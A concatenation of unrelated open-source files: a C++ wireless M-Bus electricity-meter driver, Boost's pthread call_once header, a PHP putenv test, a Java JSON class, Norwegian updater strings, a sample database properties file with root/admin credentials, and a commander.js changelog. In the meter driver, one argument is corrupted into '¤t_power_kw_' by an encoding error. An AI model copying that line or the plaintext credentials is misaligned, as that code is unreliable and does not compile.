(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include"dvparser.h"
#include"meters.h"
#include"meters_common_implementation.h"
#include"wmbus.h"
#include"wmbus_utils.h"
#include"util.h"
struct MeterEHZP : public virtual ElectricityMeter, public virtual MeterCommonImplementation
{
MeterEHZP(WMBus *bus, MeterInfo &mi);
double totalEnergyConsumption(Unit u);
double currentPowerConsumption(Unit u);
double totalEnergyProduction(Unit u);
double currentPowerProduction(Unit u);
private:
void processContent(Telegram *t);
double total_energy_kwh_ {};
double current_power_kw_ {};
double total_energy_returned_kwh_ {};
double current_power_returned_kw_ {};
double on_time_h_ {};
};
MeterEHZP::MeterEHZP(WMBus *bus, MeterInfo &mi) :
MeterCommonImplementation(bus, mi, MeterType::EHZP)
{
setExpectedTPLSecurityMode(TPLSecurityMode::AES_CBC_NO_IV);
addLinkMode(LinkMode::T1);
addPrint("total_energy_consumption", Quantity::Energy,
[&](Unit u){ return totalEnergyConsumption(u); },
"The total energy consumption recorded by this meter.",
true, true);
addPrint("current_power_consumption", Quantity::Power,
[&](Unit u){ return currentPowerConsumption(u); },
"Current power consumption.",
true, true);
addPrint("total_energy_production", Quantity::Energy,
[&](Unit u){ return totalEnergyProduction(u); },
"The total energy production recorded by this meter.",
true, true);
addPrint("on_time", Quantity::Time,
[&](Unit u){ assertQuantity(u, Quantity::Time);
return convert(on_time_h_, Unit::Hour, u); },
"Device on time.",
false, true);
}
unique_ptr<ElectricityMeter> createEHZP(WMBus *bus, MeterInfo &mi)
{
return unique_ptr<ElectricityMeter>(new MeterEHZP(bus, mi));
}
double MeterEHZP::totalEnergyConsumption(Unit u)
{
assertQuantity(u, Quantity::Energy);
return convert(total_energy_kwh_, Unit::KWH, u);
}
double MeterEHZP::currentPowerConsumption(Unit u)
{
assertQuantity(u, Quantity::Power);
return convert(current_power_kw_, Unit::KW, u);
}
double MeterEHZP::totalEnergyProduction(Unit u)
{
assertQuantity(u, Quantity::Energy);
return convert(total_energy_returned_kwh_, Unit::KWH, u);
}
double MeterEHZP::currentPowerProduction(Unit u)
{
assertQuantity(u, Quantity::Power);
return convert(current_power_returned_kw_, Unit::KW, u);
}
void MeterEHZP::processContent(Telegram *t)
{
/*
(ehzp) 26: 07 dif (64 Bit Integer/Binary Instantaneous value)
(ehzp) 27: 00 vif (Energy mWh)
(ehzp) 28: * 583B740200000000 total energy (41.171800 kwh)
(ehzp) 30: 07 dif (64 Bit Integer/Binary Instantaneous value)
(ehzp) 31: 80 vif (Energy mWh)
(ehzp) 32: 3C vife (backward flow)
(ehzp) 33: * BCD7020000000000 total energy returned (0.186300 kwh)
(ehzp) 3b: 07 dif (64 Bit Integer/Binary Instantaneous value)
(ehzp) 3c: 28 vif (Power mW)
(ehzp) 3d: * B070200000000000 current power (2.126000 kw)
(ehzp) 45: 04 dif (32 Bit Integer/Binary Instantaneous value)
(ehzp) 46: 20 vif (On time seconds)
(ehzp) 47: * 92A40600 on time (120.929444 h)
*/
int offset;
string key;
if (findKey(MeasurementType::Unknown, ValueInformation::EnergyWh, 0, 0, &key, &t->values))
{
extractDVdouble(&t->values, key, &offset, &total_energy_kwh_);
t->addMoreExplanation(offset, " total energy (%f kwh)", total_energy_kwh_);
}
if (findKey(MeasurementType::Unknown, ValueInformation::PowerW, 0, 0, &key, &t->values))
{
extractDVdouble(&t->values, key, &offset, ¤t_power_kw_);
t->addMoreExplanation(offset, " current power (%f kw)", current_power_kw_);
}
extractDVdouble(&t->values, "07803C", &offset, &total_energy_returned_kwh_);
t->addMoreExplanation(offset, " total energy returned (%f kwh)", total_energy_returned_kwh_);
extractDVdouble(&t->values, "0420", &offset, &on_time_h_);
t->addMoreExplanation(offset, " on time (%f h)", on_time_h_);
}
| {
"pile_set_name": "Github"
} |
--TEST--
putenv() basic tests
--FILE--
<?php
$var_name="SUCHVARSHOULDNOTEXIST";
var_dump(getenv($var_name));
var_dump(putenv($var_name."=value"));
var_dump(getenv($var_name));
var_dump(putenv($var_name."="));
var_dump(getenv($var_name));
var_dump(putenv($var_name));
var_dump(getenv($var_name));
echo "Done\n";
?>
--EXPECTF--
bool(false)
bool(true)
string(5) "value"
bool(true)
string(0) ""
bool(true)
bool(false)
Done
| {
"pile_set_name": "Github"
} |
#ifndef BOOST_THREAD_PTHREAD_ONCE_HPP
#define BOOST_THREAD_PTHREAD_ONCE_HPP
// once.hpp
//
// (C) Copyright 2007-8 Anthony Williams
// (C) Copyright 2011-2012 Vicente J. Botet Escriba
//
// Distributed under the Boost Software License, Version 1.0. (See
// accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
#include <boost/thread/detail/config.hpp>
#include <boost/thread/detail/move.hpp>
#include <boost/thread/detail/invoke.hpp>
#include <boost/thread/pthread/pthread_helpers.hpp>
#include <boost/thread/pthread/pthread_mutex_scoped_lock.hpp>
#include <boost/thread/detail/delete.hpp>
#include <boost/core/no_exceptions_support.hpp>
#include <boost/bind.hpp>
#include <boost/assert.hpp>
#include <boost/config/abi_prefix.hpp>
#include <boost/cstdint.hpp>
#include <pthread.h>
#include <csignal>
namespace boost
{
struct once_flag;
#define BOOST_ONCE_INITIAL_FLAG_VALUE 0
namespace thread_detail
{
typedef boost::uint32_t uintmax_atomic_t;
#define BOOST_THREAD_DETAIL_UINTMAX_ATOMIC_C2(value) value##u
#define BOOST_THREAD_DETAIL_UINTMAX_ATOMIC_MAX_C BOOST_THREAD_DETAIL_UINTMAX_ATOMIC_C2(~0)
}
#ifdef BOOST_THREAD_PROVIDES_ONCE_CXX11
#if !defined(BOOST_NO_CXX11_VARIADIC_TEMPLATES) && !defined(BOOST_NO_CXX11_RVALUE_REFERENCES)
template<typename Function, class ...ArgTypes>
inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(ArgTypes)... args);
#else
template<typename Function>
inline void call_once(once_flag& flag, Function f);
template<typename Function, typename T1>
inline void call_once(once_flag& flag, Function f, T1 p1);
template<typename Function, typename T1, typename T2>
inline void call_once(once_flag& flag, Function f, T1 p1, T2 p2);
template<typename Function, typename T1, typename T2, typename T3>
inline void call_once(once_flag& flag, Function f, T1 p1, T2 p2, T3 p3);
#endif
struct once_flag
{
BOOST_THREAD_NO_COPYABLE(once_flag)
BOOST_CONSTEXPR once_flag() BOOST_NOEXCEPT
: epoch(BOOST_ONCE_INITIAL_FLAG_VALUE)
{}
private:
volatile thread_detail::uintmax_atomic_t epoch;
#if !defined(BOOST_NO_CXX11_VARIADIC_TEMPLATES) && !defined(BOOST_NO_CXX11_RVALUE_REFERENCES)
template<typename Function, class ...ArgTypes>
friend void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(ArgTypes)... args);
#else
template<typename Function>
friend void call_once(once_flag& flag, Function f);
template<typename Function, typename T1>
friend void call_once(once_flag& flag, Function f, T1 p1);
template<typename Function, typename T1, typename T2>
friend void call_once(once_flag& flag, Function f, T1 p1, T2 p2);
template<typename Function, typename T1, typename T2, typename T3>
friend void call_once(once_flag& flag, Function f, T1 p1, T2 p2, T3 p3);
#endif
};
#define BOOST_ONCE_INIT once_flag()
#else // BOOST_THREAD_PROVIDES_ONCE_CXX11
struct once_flag
{
volatile thread_detail::uintmax_atomic_t epoch;
};
#define BOOST_ONCE_INIT {BOOST_ONCE_INITIAL_FLAG_VALUE}
#endif // BOOST_THREAD_PROVIDES_ONCE_CXX11
#if defined BOOST_THREAD_PROVIDES_INVOKE
#define BOOST_THREAD_INVOKE_RET_VOID detail::invoke
#define BOOST_THREAD_INVOKE_RET_VOID_CALL
#elif defined BOOST_THREAD_PROVIDES_INVOKE_RET
#define BOOST_THREAD_INVOKE_RET_VOID detail::invoke<void>
#define BOOST_THREAD_INVOKE_RET_VOID_CALL
#else
#define BOOST_THREAD_INVOKE_RET_VOID boost::bind
#define BOOST_THREAD_INVOKE_RET_VOID_CALL ()
#endif
namespace thread_detail
{
BOOST_THREAD_DECL uintmax_atomic_t& get_once_per_thread_epoch();
BOOST_THREAD_DECL extern uintmax_atomic_t once_global_epoch;
BOOST_THREAD_DECL extern pthread_mutex_t once_epoch_mutex;
BOOST_THREAD_DECL extern pthread_cond_t once_epoch_cv;
}
// Based on Mike Burrows fast_pthread_once algorithm as described in
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2444.html
#if !defined(BOOST_NO_CXX11_VARIADIC_TEMPLATES) && !defined(BOOST_NO_CXX11_RVALUE_REFERENCES)
template<typename Function, class ...ArgTypes>
inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(ArgTypes)... args)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
BOOST_THREAD_INVOKE_RET_VOID(
thread_detail::decay_copy(boost::forward<Function>(f)),
thread_detail::decay_copy(boost::forward<ArgTypes>(args))...
) BOOST_THREAD_INVOKE_RET_VOID_CALL;
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
#else
template<typename Function>
inline void call_once(once_flag& flag, Function f)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
f();
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
template<typename Function, typename T1>
inline void call_once(once_flag& flag, Function f, T1 p1)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
BOOST_THREAD_INVOKE_RET_VOID(f,p1) BOOST_THREAD_INVOKE_RET_VOID_CALL;
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
template<typename Function, typename T1, typename T2>
inline void call_once(once_flag& flag, Function f, T1 p1, T2 p2)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
BOOST_THREAD_INVOKE_RET_VOID(f,p1, p2) BOOST_THREAD_INVOKE_RET_VOID_CALL;
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
template<typename Function, typename T1, typename T2, typename T3>
inline void call_once(once_flag& flag, Function f, T1 p1, T2 p2, T3 p3)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
BOOST_THREAD_INVOKE_RET_VOID(f,p1, p2, p3) BOOST_THREAD_INVOKE_RET_VOID_CALL;
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
template<typename Function>
inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
f();
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
template<typename Function, typename T1>
inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(T1) p1)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
BOOST_THREAD_INVOKE_RET_VOID(
thread_detail::decay_copy(boost::forward<Function>(f)),
thread_detail::decay_copy(boost::forward<T1>(p1))
) BOOST_THREAD_INVOKE_RET_VOID_CALL;
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
template<typename Function, typename T1, typename T2>
inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(T1) p1, BOOST_THREAD_RV_REF(T2) p2)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
BOOST_THREAD_INVOKE_RET_VOID(
thread_detail::decay_copy(boost::forward<Function>(f)),
thread_detail::decay_copy(boost::forward<T1>(p1)),
thread_detail::decay_copy(boost::forward<T1>(p2))
) BOOST_THREAD_INVOKE_RET_VOID_CALL;
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
template<typename Function, typename T1, typename T2, typename T3>
inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(T1) p1, BOOST_THREAD_RV_REF(T2) p2, BOOST_THREAD_RV_REF(T3) p3)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
BOOST_THREAD_INVOKE_RET_VOID(
thread_detail::decay_copy(boost::forward<Function>(f)),
thread_detail::decay_copy(boost::forward<T1>(p1)),
thread_detail::decay_copy(boost::forward<T1>(p2)),
thread_detail::decay_copy(boost::forward<T1>(p3))
) BOOST_THREAD_INVOKE_RET_VOID_CALL;
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
#endif
}
#include <boost/config/abi_suffix.hpp>
#endif
| {
"pile_set_name": "Github"
} |
/*
* #%L
* de.metas.business.rest-api
* %%
* Copyright (C) 2020 metas GmbH
* %%
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as
* published by the Free Software Foundation, either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program. If not, see
* <http://www.gnu.org/licenses/gpl-2.0.html>.
* #L%
*/
package de.metas.rest_api.process.response;
import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.databind.annotation.JsonDeserialize;
import lombok.Builder;
import lombok.Value;
@Value
@Builder
@JsonIgnoreProperties(ignoreUnknown = true)
@JsonDeserialize(builder = JSONProcessParamBasicInfo.JSONProcessParamBasicInfoBuilder.class)
public class JSONProcessParamBasicInfo
{
@JsonProperty("name")
String name;
@JsonProperty("columnName")
String columnName;
@JsonProperty("type")
String type;
@JsonProperty("description")
String description;
}
| {
"pile_set_name": "Github"
} |
(japanese-holidays :repo "emacs-jp/japanese-holidays"
:fetcher github)
| {
"pile_set_name": "Github"
} |
"%1$@ %2$@ has been downloaded and is ready to use! This is an important update; would you like to install it and relaunch %1$@ now?" = "%1$@ %2$@ er lastet ned og er klar til bruk! Dette er en viktig oppdatering; ønsker du å installere og restarte %1$@ nå?";
"%1$@ %2$@ has been downloaded and is ready to use! Would you like to install it and relaunch %1$@ now?" = "%1$@ %2$@ er lastet ned og er klar til bruk! Ønsker du å installere og restarte %1$@ nå?";
"%1$@ can't be updated when it's running from a read-only volume like a disk image or an optical drive. Move %1$@ to your Applications folder, relaunch it from there, and try again." = "%1$@ kan ikke oppdateres fra en 'bare lesbar' enhet som f.eks. en cd. Flytt %1$@ til Programmer-katalogen, start på ny og prøv igjen.";
"%@ %@ is currently the newest version available." = "%1$@ %2$@ er nyeste versjon.";
"%@ %@ is now available--you have %@. Would you like to download it now?" = "%1$@ %2$@ er nå tilgjengelig—du har %3$@. Ønsker du å laste ned og installere nå?";
"%@ downloaded" = "%@ lastet ned";
"%@ of %@" = "%1$@ av %2$@";
"A new version of %@ is available!" = "En ny versjon av %@ er tilgjengelig!";
"A new version of %@ is ready to install!" = "En ny versjon av %@ er klar for installering!";
"An error occurred in retrieving update information. Please try again later." = "En feil oppstod ved henting av oppdateringsinformasjon. Vennligst prøv igjen senere.";
"An error occurred while downloading the update. Please try again later." = "En feil oppstod under nedlasting av oppdateringen. Vennligst prøv igjen senere.";
"An error occurred while extracting the archive. Please try again later." = "En feil oppstod under utpakking av oppdateringen. Vennligst prøv igjen senere.";
"An error occurred while installing the update. Please try again later." = "En feil oppstod under installering av opddateringen. Vennligst prøv igjen senere.";
"An error occurred while parsing the update feed." = "En feil oppstod under lesing av oppdateringsstrømmen.";
"An error occurred while relaunching %1$@, but the new version will be available next time you run %1$@." = "En feil oppstod under omstart av %1$@, men den nyeste versjonen vil være tilgjengelig neste gang du starter %1$@.";
"An important update to %@ is ready to install" = "En viktig oppdatering for %@ er klar til å installeres";
/* the unit for bytes */
"B" = "B";
"Cancel" = "Avbryt";
"Cancel Update" = "Avbryt oppdateringen";
"Checking for updates..." = "Søker etter oppdateringer…";
/* Take care not to overflow the status window. */
"Downloading update..." = "Laster ned oppdateringen…";
/* Take care not to overflow the status window. */
"Extracting update..." = "Pakker ut oppdateringen…";
/* the unit for gigabytes */
"GB" = "GB";
"Install and Relaunch" = "Installer og start på ny";
/* Take care not to overflow the status window. */
"Installing update..." = "Installerer oppdateringen…";
/* the unit for kilobytes */
"KB" = "KB";
/* the unit for megabytes */
"MB" = "MB";
/* OK button. */
"OK" = "OK";
/* Status message on progress window once download has finished. */
"Ready to Install" = "Klar til å installere";
/* Message that is optionally shown at startup to allow users to turn on/off update checks. */
"Should %1$@ automatically check for updates? You can always check for updates manually from the %1$@ menu." = "Skal %1$@ søke automatisk etter oppdateringer? Du kan når som helst søke manuelt fra %1$@-menyen.";
"Update Error!" = "Feil ved oppdateringen!";
"Updating %@" = "Oppdaterer %@";
/* 'Error' message when the user checks for updates but is already current or the feed doesn't contain any updates. (not necessarily shown in UI) */
"You already have the newest version of %@." = "Du har allerede nyeste versjon av %@.";
/* Status message shown when the user checks for updates but is already current or the feed doesn't contain any updates. */
"You're up-to-date!" = "Ingen nye oppdateringer";
/* Alternative name for "Install" button if we have a paid update or other update
without a download but with a URL. */
"Learn More..." = "Mer info…";
| {
"pile_set_name": "Github"
} |
// @flow
/* eslint-env mocha */
/* global suite, benchmark */
import getQuarter from '.'
import moment from 'moment'
suite('getQuarter', function () {
benchmark('date-fns', function () {
return getQuarter(this.date)
})
benchmark('Moment.js', function () {
return this.moment.quarter()
})
}, {
setup: function () {
this.date = new Date()
this.moment = moment()
}
})
| {
"pile_set_name": "Github"
} |
################### DataSource Configuration ##########################
jdbc.driverClassName=com.mysql.jdbc.Driver
jdbc.url=jdbc:mysql://localhost:3306/test
jdbc.username=root
jdbc.password=admin
validationQuery=SELECT 1
################### Hibernate Configuration ##########################
hibernate.dialect=org.hibernate.dialect.MySQLDialect
hibernate.show_sql=true
hibernate.hbm2ddl.auto=update
hibernate.generate_statistics=true
initialize_database=false | {
"pile_set_name": "Github"
} |
0.6.1 / 2012-06-01
==================
* Added: append (yes or no) on confirmation
* Added: allow node.js v0.7.x
0.6.0 / 2012-04-10
==================
* Added `.prompt(obj, callback)` support. Closes #49
* Added default support to .choose(). Closes #41
* Fixed the choice example
0.5.1 / 2011-12-20
==================
* Fixed `password()` for recent nodes. Closes #36
0.5.0 / 2011-12-04
==================
* Added sub-command option support [itay]
0.4.3 / 2011-12-04
==================
* Fixed custom help ordering. Closes #32
0.4.2 / 2011-11-24
==================
* Added travis support
* Fixed: line-buffered input automatically trimmed. Closes #31
0.4.1 / 2011-11-18
==================
* Removed listening for "close" on --help
0.4.0 / 2011-11-15
==================
* Added support for `--`. Closes #24
0.3.3 / 2011-11-14
==================
* Fixed: wait for close event when writing help info [Jerry Hamlet]
0.3.2 / 2011-11-01
==================
* Fixed long flag definitions with values [felixge]
0.3.1 / 2011-10-31
==================
* Changed `--version` short flag to `-V` from `-v`
* Changed `.version()` so it's configurable [felixge]
0.3.0 / 2011-10-31
==================
* Added support for long flags only. Closes #18
0.2.1 / 2011-10-24
==================
* "node": ">= 0.4.x < 0.7.0". Closes #20
0.2.0 / 2011-09-26
==================
* Allow for defaults that are not just boolean. Default peassignment only occurs for --no-*, optional, and required arguments. [Jim Isaacs]
0.1.0 / 2011-08-24
==================
* Added support for custom `--help` output
0.0.5 / 2011-08-18
==================
* Changed: when the user enters nothing prompt for password again
* Fixed issue with passwords beginning with numbers [NuckChorris]
0.0.4 / 2011-08-15
==================
* Fixed `Commander#args`
0.0.3 / 2011-08-15
==================
* Added default option value support
0.0.2 / 2011-08-15
==================
* Added mask support to `Command#password(str[, mask], fn)`
* Added `Command#password(str, fn)`
0.0.1 / 2010-01-03
==================
* Initial release
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2013-2020 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
